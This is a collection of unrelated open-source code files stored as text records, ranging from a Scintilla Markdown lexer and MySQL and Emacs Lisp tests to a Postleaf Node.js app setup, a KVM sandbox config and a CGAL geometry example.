((IsNewline(c) || sc.currentPos + i == endPos) &&\n count >= 3 && !HasPrevLineContent(sc)) {\n sc.SetState(SCE_MARKDOWN_HRULE);\n sc.Forward(i);\n sc.SetState(SCE_MARKDOWN_LINE_BEGIN);\n return true;\n }\n else {\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n\t\treturn false;\n }\n }\n }\n}\n\nstatic void ColorizeMarkdownDoc(Sci_PositionU startPos, Sci_Position length, int initStyle,\n WordList **, Accessor &styler) {\n Sci_PositionU endPos = startPos + length;\n int precharCount = 0;\n bool isLinkNameDetecting = false;\n // Don't advance on a new loop 
iteration and retry at the same position.\n // Useful in the corner case of having to start at the beginning file position\n // in the default state.\n bool freezeCursor = false;\n\n StyleContext sc(startPos, length, initStyle, styler);\n\n while (sc.More()) {\n // Skip past escaped characters\n if (sc.ch == '\\\\') {\n sc.Forward();\n continue;\n }\n\n // A blockquotes resets the line semantics\n if (sc.state == SCE_MARKDOWN_BLOCKQUOTE)\n sc.SetState(SCE_MARKDOWN_LINE_BEGIN);\n\n // Conditional state-based actions\n if (sc.state == SCE_MARKDOWN_CODE2) {\n if (sc.Match(\"``\") && sc.GetRelative(-2) != ' ') {\n sc.Forward(2);\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n }\n }\n else if (sc.state == SCE_MARKDOWN_CODE) {\n if (sc.ch == '`' && sc.chPrev != ' ')\n sc.ForwardSetState(SCE_MARKDOWN_DEFAULT);\n }\n /* De-activated because it gets in the way of other valid indentation\n * schemes, for example multiple paragraphs inside a list item.\n // Code block\n else if (sc.state == SCE_MARKDOWN_CODEBK) {\n bool d = true;\n if (IsNewline(sc.ch)) {\n if (sc.chNext != '\\t') {\n for (int c = 1; c < 5; ++c) {\n if (sc.GetRelative(c) != ' ')\n d = false;\n }\n }\n }\n else if (sc.atLineStart) {\n if (sc.ch != '\\t' ) {\n for (int i = 0; i < 4; ++i) {\n if (sc.GetRelative(i) != ' ')\n d = false;\n }\n }\n }\n if (!d)\n sc.SetState(SCE_MARKDOWN_LINE_BEGIN);\n }\n */\n // Strong\n else if (sc.state == SCE_MARKDOWN_STRONG1) {\n if (sc.Match(\"**\") && sc.chPrev != ' ') {\n sc.Forward(2);\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n }\n }\n else if (sc.state == SCE_MARKDOWN_STRONG2) {\n if (sc.Match(\"__\") && sc.chPrev != ' ') {\n sc.Forward(2);\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n }\n }\n // Emphasis\n else if (sc.state == SCE_MARKDOWN_EM1) {\n if (sc.ch == '*' && sc.chPrev != ' ')\n sc.ForwardSetState(SCE_MARKDOWN_DEFAULT);\n }\n else if (sc.state == SCE_MARKDOWN_EM2) {\n if (sc.ch == '_' && sc.chPrev != ' ')\n sc.ForwardSetState(SCE_MARKDOWN_DEFAULT);\n }\n else if (sc.state == SCE_MARKDOWN_CODEBK) {\n if (sc.atLineStart && sc.Match(\"~~~\")) {\n Sci_Position i = 1;\n while (!IsNewline(sc.GetRelative(i)) && sc.currentPos + i < endPos)\n i++;\n sc.Forward(i);\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n }\n }\n else if (sc.state == SCE_MARKDOWN_STRIKEOUT) {\n if (sc.Match(\"~~\") && sc.chPrev != ' ') {\n sc.Forward(2);\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n }\n }\n else if (sc.state == SCE_MARKDOWN_LINE_BEGIN) {\n // Header\n if (sc.Match(\"######\"))\n SetStateAndZoom(SCE_MARKDOWN_HEADER6, 6, '#', sc);\n else if (sc.Match(\"#####\"))\n SetStateAndZoom(SCE_MARKDOWN_HEADER5, 5, '#', sc);\n else if (sc.Match(\"####\"))\n SetStateAndZoom(SCE_MARKDOWN_HEADER4, 4, '#', sc);\n else if (sc.Match(\"###\"))\n SetStateAndZoom(SCE_MARKDOWN_HEADER3, 3, '#', sc);\n else if (sc.Match(\"##\"))\n SetStateAndZoom(SCE_MARKDOWN_HEADER2, 2, '#', sc);\n else if (sc.Match(\"#\")) {\n // Catch the special case of an unordered list\n if (sc.chNext == '.' 
&& IsASpaceOrTab(sc.GetRelative(2))) {\n precharCount = 0;\n sc.SetState(SCE_MARKDOWN_PRECHAR);\n }\n else\n SetStateAndZoom(SCE_MARKDOWN_HEADER1, 1, '#', sc);\n }\n // Code block\n else if (sc.Match(\"~~~\")) {\n if (!HasPrevLineContent(sc))\n sc.SetState(SCE_MARKDOWN_CODEBK);\n else\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n }\n else if (sc.ch == '=') {\n if (HasPrevLineContent(sc) && FollowToLineEnd('=', SCE_MARKDOWN_HEADER1, endPos, sc))\n ;\n else\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n }\n else if (sc.ch == '-') {\n if (HasPrevLineContent(sc) && FollowToLineEnd('-', SCE_MARKDOWN_HEADER2, endPos, sc))\n ;\n else {\n precharCount = 0;\n sc.SetState(SCE_MARKDOWN_PRECHAR);\n }\n }\n else if (IsNewline(sc.ch))\n sc.SetState(SCE_MARKDOWN_LINE_BEGIN);\n else {\n precharCount = 0;\n sc.SetState(SCE_MARKDOWN_PRECHAR);\n }\n }\n\n // The header lasts until the newline\n else if (sc.state == SCE_MARKDOWN_HEADER1 || sc.state == SCE_MARKDOWN_HEADER2 ||\n sc.state == SCE_MARKDOWN_HEADER3 || sc.state == SCE_MARKDOWN_HEADER4 ||\n sc.state == SCE_MARKDOWN_HEADER5 || sc.state == SCE_MARKDOWN_HEADER6) {\n if (IsNewline(sc.ch))\n sc.SetState(SCE_MARKDOWN_LINE_BEGIN);\n }\n\n // New state only within the initial whitespace\n if (sc.state == SCE_MARKDOWN_PRECHAR) {\n // Blockquote\n if (sc.ch == '>' && precharCount < 5)\n sc.SetState(SCE_MARKDOWN_BLOCKQUOTE);\n /*\n // Begin of code block\n else if (!HasPrevLineContent(sc) && (sc.chPrev == '\\t' || precharCount >= 4))\n sc.SetState(SCE_MARKDOWN_CODEBK);\n */\n // HRule - Total of three or more hyphens, asterisks, or underscores\n // on a line by themselves\n else if ((sc.ch == '-' || sc.ch == '*' || sc.ch == '_') && IsValidHrule(endPos, sc))\n ;\n // Unordered list\n else if ((sc.ch == '-' || sc.ch == '*' || sc.ch == '+') && IsASpaceOrTab(sc.chNext)) {\n sc.SetState(SCE_MARKDOWN_ULIST_ITEM);\n sc.ForwardSetState(SCE_MARKDOWN_DEFAULT);\n }\n // Ordered list\n else if (IsADigit(sc.ch)) {\n int digitCount = 0;\n while (IsADigit(sc.GetRelative(++digitCount)))\n ;\n if (sc.GetRelative(digitCount) == '.' &&\n IsASpaceOrTab(sc.GetRelative(digitCount + 1))) {\n sc.SetState(SCE_MARKDOWN_OLIST_ITEM);\n sc.Forward(digitCount + 1);\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n }\n }\n // Alternate Ordered list\n else if (sc.ch == '#' && sc.chNext == '.' 
&& IsASpaceOrTab(sc.GetRelative(2))) {\n sc.SetState(SCE_MARKDOWN_OLIST_ITEM);\n sc.Forward(2);\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n }\n else if (sc.ch != ' ' || precharCount > 2)\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n else\n ++precharCount;\n }\n\n // Any link\n if (sc.state == SCE_MARKDOWN_LINK) {\n if (sc.Match(\"](\") && sc.GetRelative(-1) != '\\\\') {\n sc.Forward(2);\n isLinkNameDetecting = true;\n }\n else if (sc.Match(\"]:\") && sc.GetRelative(-1) != '\\\\') {\n sc.Forward(2);\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n }\n else if (!isLinkNameDetecting && sc.ch == ']' && sc.GetRelative(-1) != '\\\\') {\n sc.Forward();\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n }\n else if (isLinkNameDetecting && sc.ch == ')' && sc.GetRelative(-1) != '\\\\') {\n sc.Forward();\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n isLinkNameDetecting = false;\n }\n }\n\n // New state anywhere in doc\n if (sc.state == SCE_MARKDOWN_DEFAULT) {\n if (sc.atLineStart && sc.ch == '#') {\n sc.SetState(SCE_MARKDOWN_LINE_BEGIN);\n freezeCursor = true;\n }\n // Links and Images\n if (sc.Match(\"![\")) {\n sc.SetState(SCE_MARKDOWN_LINK);\n sc.Forward(2);\n }\n else if (sc.ch == '[' && sc.GetRelative(-1) != '\\\\') {\n sc.SetState(SCE_MARKDOWN_LINK);\n sc.Forward();\n }\n // Code - also a special case for alternate inside spacing\n else if (sc.Match(\"``\") && sc.GetRelative(3) != ' ' && AtTermStart(sc)) {\n sc.SetState(SCE_MARKDOWN_CODE2);\n sc.Forward();\n }\n else if (sc.ch == '`' && sc.chNext != ' ' && AtTermStart(sc)) {\n sc.SetState(SCE_MARKDOWN_CODE);\n }\n // Strong\n else if (sc.Match(\"**\") && sc.GetRelative(2) != ' ' && AtTermStart(sc)) {\n sc.SetState(SCE_MARKDOWN_STRONG1);\n sc.Forward();\n }\n else if (sc.Match(\"__\") && sc.GetRelative(2) != ' ' && AtTermStart(sc)) {\n sc.SetState(SCE_MARKDOWN_STRONG2);\n sc.Forward();\n }\n // Emphasis\n else if (sc.ch == '*' && sc.chNext != ' ' && AtTermStart(sc)) {\n sc.SetState(SCE_MARKDOWN_EM1);\n }\n else if (sc.ch == '_' && sc.chNext != ' ' && AtTermStart(sc)) {\n sc.SetState(SCE_MARKDOWN_EM2);\n }\n // Strikeout\n else if (sc.Match(\"~~\") && sc.GetRelative(2) != ' ' && AtTermStart(sc)) {\n sc.SetState(SCE_MARKDOWN_STRIKEOUT);\n sc.Forward();\n }\n // Beginning of line\n else if (IsNewline(sc.ch)) {\n sc.SetState(SCE_MARKDOWN_LINE_BEGIN);\n }\n }\n // Advance if not holding back the cursor for this iteration.\n if (!freezeCursor)\n sc.Forward();\n freezeCursor = false;\n }\n sc.Complete();\n}\n\nLexerModule lmMarkdown(SCLEX_MARKDOWN, ColorizeMarkdownDoc, \"markdown\");\n"} {"text": "nvkm-y += nvkm/engine/sw/base.o\nnvkm-y += nvkm/engine/sw/nv04.o\nnvkm-y += nvkm/engine/sw/nv10.o\nnvkm-y += nvkm/engine/sw/nv50.o\nnvkm-y += nvkm/engine/sw/gf100.o\n\nnvkm-y += nvkm/engine/sw/chan.o\n\nnvkm-y += nvkm/engine/sw/nvsw.o\n"} {"text": "# Tests for PERFORMANCE_SCHEMA\n\n--source include/not_embedded.inc\n--source include/have_perfschema.inc\n\n# The query result are not re producible,\n# due to variations in platforms and plugins\n# We still execute the select statement, for:\n# - code coverage\n# - make sure it does not crash\n# - valgrind coverage\n\n--disable_result_log\nselect * from performance_schema.setup_instruments;\n--enable_result_log\n\n# DEBUG_SYNC::mutex is dependent on the build (DEBUG only)\n\nselect * from performance_schema.setup_instruments\n where name like 'Wait/Synch/Mutex/sql/%'\n and name not in ('wait/synch/mutex/sql/DEBUG_SYNC::mutex')\n order by name limit 10;\n\n# CRYPTO_dynlock_value::lock is dependent on the build (SSL)\n\nselect * from 
performance_schema.setup_instruments\n where name like 'Wait/Synch/Rwlock/sql/%'\n and name not in ('wait/synch/rwlock/sql/CRYPTO_dynlock_value::lock')\n order by name limit 10;\n\n# COND_handler_count is dependent on the build (Windows only)\n# DEBUG_SYNC::cond is dependent on the build (DEBUG only)\n# COND_main_thread_in_use is dependent on the build (non Windows)\n# COND_start_signal_handler is dependent on the build (non Windows)\n\nselect * from performance_schema.setup_instruments\n where name like 'Wait/Synch/Cond/sql/%'\n and name not in (\n 'wait/synch/cond/sql/COND_open',\n 'wait/synch/cond/sql/COND_handler_count',\n 'wait/synch/cond/sql/DEBUG_SYNC::cond',\n 'wait/synch/cond/sql/COND_socket_listener_active',\n 'wait/synch/cond/sql/COND_start_signal_handler')\n order by name limit 10;\n\n--disable_result_log\nselect * from performance_schema.setup_instruments\n where name='Wait';\n--enable_result_log\n\n--disable_result_log\nselect * from performance_schema.setup_instruments\n where enabled='YES';\n--enable_result_log\n\n--error ER_TABLEACCESS_DENIED_ERROR\ninsert into performance_schema.setup_instruments\n set name='FOO', enabled='YES', timed='YES';\n\n--error ER_WRONG_PERFSCHEMA_USAGE\nupdate performance_schema.setup_instruments\n set name='FOO';\n\nupdate performance_schema.setup_instruments\n set enabled='NO';\n\nupdate performance_schema.setup_instruments\n set timed='NO';\n\n--disable_result_log\nselect * from performance_schema.setup_instruments;\n--enable_result_log\n\nupdate performance_schema.setup_instruments\n set enabled='YES', timed='YES';\n\n--error ER_TABLEACCESS_DENIED_ERROR\ndelete from performance_schema.setup_instruments;\n\n--error ER_TABLEACCESS_DENIED_ERROR\ndelete from performance_schema.setup_instruments\n where name like 'Wait/Synch/%';\n\nLOCK TABLES performance_schema.setup_instruments READ;\nUNLOCK TABLES;\n\nLOCK TABLES performance_schema.setup_instruments WRITE;\nUNLOCK TABLES;\n\n--echo\n--echo # Bug#13813193 ASSERTION `TABLE->READ_SET ==\n--echo # &TABLE->DEF_READ_SET' FAILED / MYSQL_UPDATE\n--echo\nUPDATE performance_schema.setup_instruments SET timed='NO'\nORDER BY RAND();\n\n# Test cleanup\n\nupdate performance_schema.setup_instruments\n set enabled='YES', TIMED='YES';\n\n"} {"text": "#root {\n height: 100%;\n}\n\n#root .ant-layout {\n height: 100%;\n}\n\n#root .logo {\n width: 100%;\n color: #fff;\n text-align: center;\n height: 60px;\n font-size: 24px;\n font-weight: 700;\n text-transform: uppercase;\n background: transparent;\n float: left;\n margin-bottom: 20px;\n border-bottom: 1px solid #232e3a;\n padding-top: 10px;\n}\n\n#root .logo > img {\n width: 31px;\n height: 31px;\n}\n\n#main {\n background-image: url(https://gw.alipayobjects.com/zos/rmsportal/TVYTbAXWheQpRcWDaDMu.svg);\n background-repeat: no-repeat;\n background-position: center 110px;\n background-size: 100%;\n}\n\n#login-top {\n text-align: center;\n}\n\n#root .ant-menu-dark.ant-menu-horizontal {\n border-bottom-color: transparent;\n}\n\n/*\n.ant-menu.ant-menu-dark .ant-menu-item-selected, .ant-menu-submenu-popup.ant-menu-dark .ant-menu-item-selected {\n background-color: #1ac09e;\n}\n*/\n.vullevel {\n width: 50%;\n}\n\n.vultype {\n width: 50%;\n}\n\n.ant-form-inline .ant-form-item {\n display: inline-block;\n margin-right: 0px;\n margin-bottom: 0;\n width: 100%;\n}\n\n.ant-form-inline .ant-form-item > .ant-form-item-control-wrapper, .ant-form-inline .ant-form-item > .ant-form-item-label {\n display: inline-block;\n vertical-align: middle;\n width: 
100%;\n}\n\n/*滚动字幕*/\n.marquee {\n color: #000000;\n margin: 0 auto;\n overflow: hidden;\n white-space: nowrap;\n box-sizing: border-box;\n animation: marquee 10s linear infinite;\n}\n\n.marquee:hover {\n animation-play-state: paused\n}\n\n/* Make it move */\n@keyframes marquee {\n 0% {\n text-indent: 27.5em\n }\n 100% {\n text-indent: -105em\n }\n}"} {"text": "'use strict';\n\nmodule.exports = function(app, options) {\n options = options || {};\n\n // Globals\n global.__basedir = __dirname;\n global.__version = require('./package.json').version;\n\n // Node modules\n const BodyParser = require('body-parser');\n const Chalk = require('chalk');\n const CookieParser = require('cookie-parser');\n const Compression = require('compression');\n const DustHelpers = require('dustjs-helpers');\n const Express = require('express');\n const Path = require('path');\n const Promise = require('bluebird');\n const Slashes = require('connect-slashes');\n\n // Local modules\n const DustEngine = require(Path.join(__basedir, 'source/modules/dust_engine.js'));\n const DynamicImages = require(Path.join(__basedir, 'source/modules/dynamic_images.js'));\n const HtmlHelpers = require(Path.join(__basedir, 'source/modules/helpers/html_helpers.js'));\n const I18n = require(Path.join(__basedir, 'source/modules/i18n.js'));\n const ThemeHelpers = require(Path.join(__basedir, 'source/modules/helpers/theme_helpers.js'));\n const UtilityHelpers = require(Path.join(__basedir, 'source/modules/helpers/utility_helpers.js'));\n\n // Express app\n const AdminRouter = require(Path.join(__basedir, 'source/routers/admin_router.js'));\n const ApiRouter = require(Path.join(__basedir, 'source/routers/api_router.js'));\n const ThemeRouter = require(Path.join(__basedir, 'source/routers/theme_router.js'));\n const AuthMiddleware = require(Path.join(__basedir, 'source/middleware/auth_middleware'));\n const ViewMiddleware = require(Path.join(__basedir, 'source/middleware/view_middleware.js'));\n const ErrorController = require(Path.join(__basedir, 'source/controllers/error_controller.js'));\n\n // Database\n const Database = require(Path.join(__basedir, 'source/modules/database.js'))(options);\n app.locals.Database = Database;\n \n // Themes stored on app.locals so we can access the configured directory\n const Themes = require(Path.join(__basedir, 'source/modules/themes.js'))(options);\n app.locals.Themes = Themes;\n \n // Stash upload path on app.locals so we can access the configured directory\n app.locals.uploadPath = options.uploadPath || Path.join(__basedir, 'uploads');\n \n\n return Promise.resolve()\n // Initialize the database\n .then(() => Database.init())\n .then(() => {\n let models = Database.sequelize.models;\n\n // Generate search indexes on startup\n return Promise.all([\n models.post.buildSearchIndex(),\n models.user.buildSearchIndex(),\n models.tag.buildSearchIndex()\n ]);\n })\n // Load settings into app.locals.Settings\n .then(() => Database.loadSettings())\n .then((settings) => app.locals.Settings = settings)\n // Load navigation into app.locals.Navigation\n .then(() => Database.sequelize.models.navigation.getArray())\n .then((navigation) => app.locals.Navigation = navigation)\n // Load i18n into app.locals.I18n\n .then(() => {\n app.locals.I18n = I18n;\n return app.locals.I18n.load(app.locals.Settings.language);\n })\n // Start the app\n .then(() => {\n // App config\n app.enable('strict routing');\n app.disable('x-powered-by');\n\n // App-level middleware\n app\n .use(Slashes(false))\n .use(CookieParser())\n 
.use(Compression())\n .use(DynamicImages.processImages)\n .use('/assets', Express.static(Path.join(__basedir, 'assets')))\n .use('/themes', Express.static(Themes.themePath))\n .use('/uploads', Express.static(app.locals.uploadPath))\n .use(BodyParser.urlencoded({ extended: true, limit: '10mb' }))\n .use(AuthMiddleware.attachUser)\n .use(ViewMiddleware.attachViewData);\n\n // View engine\n app.engine('dust', DustEngine.engine(app, {\n cache: process.env.NODE_ENV === 'production',\n helpers: [DustHelpers, HtmlHelpers, UtilityHelpers, ThemeHelpers]\n }));\n app.set('json spaces', process.env.NODE_ENV === 'production' ? undefined : 2);\n app.set('views', [\n Path.join(Themes.themePath, app.locals.Settings.theme, 'templates'),\n Path.join(__basedir, 'source/views')\n ]);\n app.set('view engine', 'dust');\n\n // App routers\n ApiRouter(app);\n AdminRouter(app);\n ThemeRouter(app);\n\n // Error pages\n app.use(ErrorController.notFound);\n app.use(ErrorController.applicationError);\n })\n .catch((err) => {\n console.error(\n Chalk.red('Error: ') + 'Postleaf failed to initialize! 🐛\\n\\n' +\n Chalk.red(err.stack)\n );\n });\n};\n"} {"text": ";;; cider-browse-ns-tests.el\n\n;; Copyright © 2012-2016 Tim King, Bozhidar Batsov\n\n;; Author: Tim King \n;; Bozhidar Batsov \n;; Artur Malabarba \n\n;; This file is NOT part of GNU Emacs.\n\n;; This program is free software: you can redistribute it and/or\n;; modify it under the terms of the GNU General Public License as\n;; published by the Free Software Foundation, either version 3 of the\n;; License, or (at your option) any later version.\n;;\n;; This program is distributed in the hope that it will be useful, but\n;; WITHOUT ANY WARRANTY; without even the implied warranty of\n;; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n;; General Public License for more details.\n;;\n;; You should have received a copy of the GNU General Public License\n;; along with this program. 
If not, see `http://www.gnu.org/licenses/'.\n\n;;; Commentary:\n\n;; This file is part of CIDER\n\n;;; Code:\n\n(require 'buttercup)\n(require 'cider-browse-ns)\n\n(describe \"cider-browse-ns--text-face\"\n (it \"identifies a function\"\n (expect (cider-browse-ns--text-face '(dict \"arglists\" \"fn arg list\"))\n :to-equal 'font-lock-function-name-face))\n\n (it \"identifies a macro\"\n (expect (cider-browse-ns--text-face '(dict \"arglists\" \"fn arg list\" \"macro\" \"true\"))\n :to-equal 'font-lock-keyword-face))\n\n (it \"identifies a variable\"\n (expect (cider-browse-ns--text-face '(dict))\n :to-equal 'font-lock-variable-name-face)))\n\n(describe \"cider-browse-ns\"\n :var (cider-browse-ns-buffer)\n (it \"lists out all forms of a namespace with correct font-locks\"\n (spy-on 'cider-sync-request:ns-vars-with-meta :and-return-value\n '(dict \"blank?\"\n (dict \"arglists\" \"fn arg list\"\n \"doc\" \"\\\"True if s is nil, empty, or contains only whitespace.\\\"\")))\n\n (with-temp-buffer\n (setq cider-browse-ns-buffer (buffer-name (current-buffer)))\n (cider-browse-ns \"clojure.string\")\n (search-forward \"clojure\")\n (expect (get-text-property (point) 'face) :to-equal 'font-lock-type-face)\n (search-forward \"blank\")\n (expect (get-text-property (point) 'font-lock-face) :to-equal 'font-lock-function-name-face)\n (search-forward \"True\")\n (expect (get-text-property (point) 'font-lock-face) :to-equal 'font-lock-doc-face))))\n\n(describe \"cider-browse-ns--first-doc-line\"\n (it \"returns Not documented if the doc string is missing\"\n (expect (cider-browse-ns--first-doc-line nil)\n :to-equal \"Not documented.\"))\n\n (it \"returns the first line of the doc string\"\n (expect (cider-browse-ns--first-doc-line \"True if s is nil, empty, or contains only whitespace.\")\n :to-equal \"True if s is nil, empty, or contains only whitespace.\"))\n\n (it \"returns the first sentence of the doc string if the first line contains multiple sentences\"\n (expect (cider-browse-ns--first-doc-line \"First sentence. Second sentence.\")\n :to-equal \"First sentence. \"))\n\n (it \"returns the first line of the doc string if the first sentence spans multiple lines\"\n (expect (cider-browse-ns--first-doc-line \"True if s is nil, empty, or\\n contains only whitespace.\")\n :to-equal \"True if s is nil, empty, or...\")))\n"} {"text": "/*\n * Licensed to the Apache Software Foundation (ASF) under one\n * or more contributor license agreements. See the NOTICE file\n * distributed with this work for additional information\n * regarding copyright ownership. The ASF licenses this file\n * to you under the Apache License, Version 2.0 (the\n * \"License\"); you may not use this file except in compliance\n * with the License. 
You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\npackage org.apache.beam.sdk.extensions.sql.impl.rel;\n\nimport java.util.HashMap;\nimport java.util.Map;\nimport org.apache.beam.sdk.Pipeline;\nimport org.apache.beam.sdk.extensions.sql.impl.BeamSqlEnv;\nimport org.apache.beam.sdk.extensions.sql.meta.BeamSqlTable;\nimport org.apache.beam.sdk.values.PCollection;\nimport org.apache.beam.sdk.values.Row;\n\n/** Base class for rel test. */\npublic abstract class BaseRelTest {\n private static Map tables = new HashMap<>();\n protected static BeamSqlEnv env = BeamSqlEnv.readOnly(\"test\", tables);\n\n protected static PCollection compilePipeline(String sql, Pipeline pipeline) {\n return BeamSqlRelUtils.toPCollection(pipeline, env.parseQuery(sql));\n }\n\n protected static void registerTable(String tableName, BeamSqlTable table) {\n tables.put(tableName, table);\n }\n\n protected static BeamSqlTable getTable(String tableName) {\n return tables.get(tableName);\n }\n}\n"} {"text": "[kvmremote]\n# Specify a comma-separated list of available machines to be used. For each\n# specified ID you have to define a dedicated section containing the details\n# on the respective machine. (E.g. machine1, machine2, machine3)\nmachines = machine1\n\n# Specify a comma-separated list of KVM hypervisors to be used. For each\n# specified ID you have to define a dedicated section containing the details\nhypervisors = hypervisor1\n\n[hypervisor1]\n# Specify connection string for hypervisor\ndsn = qemu:///system\n# Specify interface used to sniff traffic with KVM\ninterface = br0\n\n# Specify if memory dump mode is enabled, hypervisor is remote\n# (remote memory dump capability)\n# should use a ssh shared key and root user (as actions will be performed by root)\n# remote_host = root@192.168.122.1\n\n[machine1]\n# Specify the label name of the current machine as specified in your\n# physical machine configuration.\nlabel = machine1\n\n# Specify the IP address of the current machine. Make sure that the IP address\n# is valid and that the host machine is able to reach it. If not, the analysis\n# will fail.\nip = 127.0.0.1\n\n# Specify the operating system platform used by current machine\n# [windows/darwin/linux].\nplatform = windows\n\n# Specify hypervisor name for machine\nhypervisor = rex\n"} {"text": "/*******************************************************************************\r\n * Mission Control Technologies, Copyright (c) 2009-2012, United States Government\r\n * as represented by the Administrator of the National Aeronautics and Space \r\n * Administration. All rights reserved.\r\n *\r\n * The MCT platform is licensed under the Apache License, Version 2.0 (the \r\n * \"License\"); you may not use this file except in compliance with the License. \r\n * You may obtain a copy of the License at \r\n * http://www.apache.org/licenses/LICENSE-2.0.\r\n *\r\n * Unless required by applicable law or agreed to in writing, software \r\n * distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT \r\n * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the \r\n * License for the specific language governing permissions and limitations under \r\n * the License.\r\n *\r\n * MCT includes source code licensed under additional open source licenses. See \r\n * the MCT Open Source Licenses file included with this distribution or the About \r\n * MCT Licenses dialog available at runtime from the MCT Help menu for additional \r\n * information. \r\n *******************************************************************************/\r\npackage gov.nasa.arc.mct.util.ext.commands;\n\nimport gov.nasa.arc.mct.util.ext.commands.CmdProcessBuilder;\n\nimport java.util.ArrayList;\nimport java.util.List;\n\nimport org.testng.Assert;\nimport org.testng.annotations.BeforeMethod;\nimport org.testng.annotations.Test;\n\npublic class TestCmdProcessBuilder {\n \n\tprivate CmdProcessBuilder cmdProcessBuilder;\n\t\n\t@BeforeMethod\n\tvoid setup() { \n\t cmdProcessBuilder = new CmdProcessBuilder();\n\t \n\t\tSystem.setProperty(\"ExecLimitManagerPath\", \"src/test/resources/\");\n\t\tSystem.setProperty(\"ExecLimitManagerScript\", \"launchLimitMgrTest.sh\");\n\t}\n\t\n\t@Test\n\tpublic void testOSPlatformSupported() {\n\t \n\t\tAssert.assertNotNull(cmdProcessBuilder.checkOSPlatform());\n\t\t\n\t\tif (cmdProcessBuilder.isWindows()) {\n\t\t cmdProcessBuilder.setOSPlatform(\"Windows XP\");\n\t\t Assert.assertTrue(cmdProcessBuilder.isWindows());\n\t\t}\n\t\t\n\t\tif (cmdProcessBuilder.isMacOS()) {\n\t\t cmdProcessBuilder.setOSPlatform(\"Mac OS X\");\n\t\t Assert.assertTrue(cmdProcessBuilder.isMacOS());\n\t\t}\n\t\t\n\t\tif (cmdProcessBuilder.isUNIXLinux()) {\n\t\t cmdProcessBuilder.setOSPlatform(\"Linux\");\n\t\t Assert.assertTrue(cmdProcessBuilder.isUNIXLinux());\n\t\t}\n\t\t\n\t}\n\t\n\t@Test(dependsOnMethods=\"testOSPlatformSupported\")\n\tpublic void testCmdExecSuccessful() {\n\t\tfinal String PUI = \"TESTCOMMANDPUI\";\n\t\tfinal List commandList = new ArrayList();\n\t\t\n\t\tif (cmdProcessBuilder.isMacOS()) {\n\t\t Assert.assertEquals(cmdProcessBuilder.checkOSPlatform(), \"Mac OS X\");\n\t\t commandList.add(System.getProperty(\"ExecLimitManagerScript\") + \" \" + PUI);\n\t\t} else if (cmdProcessBuilder.isUNIXLinux()) {\n\t\t commandList.add(System.getProperty(\"ExecLimitManagerScript\") + \" \" + PUI);\n\t\t}\n\t\t\n\t\tif (cmdProcessBuilder.isMacOS() || cmdProcessBuilder.isUNIXLinux()) {\n\t\t Assert.assertTrue(cmdProcessBuilder.execMultipleCommands(System.getProperty(\"ExecLimitManagerPath\"), commandList));\n\t\t}\n\t}\n\t\n\t@Test(dependsOnMethods=\"testOSPlatformSupported\")\n\tpublic void testCmdExecFailed() {\n\t\tfinal String PUI = \"XYZ123abc456\";\n\t\tfinal List commandList = new ArrayList();\n\t\t\n\t\tif (cmdProcessBuilder.isUNIXLinux()) {\n\t\t Assert.assertEquals(cmdProcessBuilder.checkOSPlatform(), \"Linux\");\n\t\t commandList.add(System.getProperty(\"ExecLimitManagerScript\") + \" \" + PUI);\n\t\t} else if (cmdProcessBuilder.isMacOS()) {\n\t\t commandList.add(System.getProperty(\"ExecLimitManagerScript\") + \" \" + PUI);\n\t\t}\n\t\t\n\t\tif (cmdProcessBuilder.isMacOS() || cmdProcessBuilder.isUNIXLinux()) {\n\t\t Assert.assertFalse(cmdProcessBuilder.execMultipleCommands(\"/wrong/path/\", commandList));\n\t\t}\n\t}\n\t\n}\n"} {"text": "//! 
\\file examples/Arrangement_on_surface_2/ex_vertical_ray_shooting.cpp\n// Answering vertical ray-shooting queries.\n\n#include \n#include \n#include \n#include \n#include \n#include \n\n#include \"point_location_utils.h\"\n\ntypedef CGAL::MP_Float Number_type;\ntypedef CGAL::Cartesian Kernel;\ntypedef CGAL::Arr_segment_traits_2 Traits_2;\ntypedef Traits_2::Point_2 Point_2;\ntypedef CGAL::Arrangement_2 Arrangement_2;\ntypedef CGAL::Arr_walk_along_line_point_location Walk_pl;\ntypedef CGAL::Arr_trapezoid_ric_point_location Trap_pl;\n\nint main ()\n{\n // Construct the arrangement.\n Arrangement_2 arr;\n Walk_pl walk_pl (arr);\n Trap_pl trap_pl;\n\n construct_segments_arr (arr);\n\n // Perform some vertical ray-shooting queries using the walk strategy.\n Point_2 q1 (1, 4);\n Point_2 q2 (4, 3);\n Point_2 q3 (6, 3);\n\n vertical_ray_shooting_query (walk_pl, q1);\n vertical_ray_shooting_query (walk_pl, q2);\n vertical_ray_shooting_query (walk_pl, q3);\n\n // Attach the trapezoid-RIC object to the arrangement and perform queries.\n Point_2 q4 (3, 2);\n Point_2 q5 (5, 2);\n Point_2 q6 (1, 0);\n\n trap_pl.attach (arr);\n vertical_ray_shooting_query (trap_pl, q4);\n vertical_ray_shooting_query (trap_pl, q5);\n vertical_ray_shooting_query (trap_pl, q6);\n\n return 0;\n}\n"} {"text": "#include \"fm_envelope_set_edit_dialog.hpp\"\n#include \"ui_fm_envelope_set_edit_dialog.h\"\n#include \n\nFMEnvelopeSetEditDialog::FMEnvelopeSetEditDialog(std::vector set, QWidget *parent) :\n\tQDialog(parent),\n\tui(new 